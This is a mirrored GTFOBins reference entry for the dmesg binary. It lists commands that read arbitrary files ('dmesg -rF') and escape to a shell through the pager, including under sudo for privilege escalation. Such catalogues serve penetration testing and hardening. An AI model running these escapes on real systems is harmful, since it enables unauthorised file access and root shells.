mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 07:49:17 +01:00
19 lines
530 B
Markdown
19 lines
530 B
Markdown
---
|
|
functions:
|
|
file-read:
|
|
- description: This is not suitable for binary files.
|
|
code: |
|
|
LFILE=file_to_read
|
|
dmesg -rF "$LFILE"
|
|
shell:
|
|
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
|
code: |
|
|
dmesg -H
|
|
!/bin/sh
|
|
sudo:
|
|
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
|
code: |
|
|
sudo dmesg -H
|
|
!/bin/sh
|
|
---
|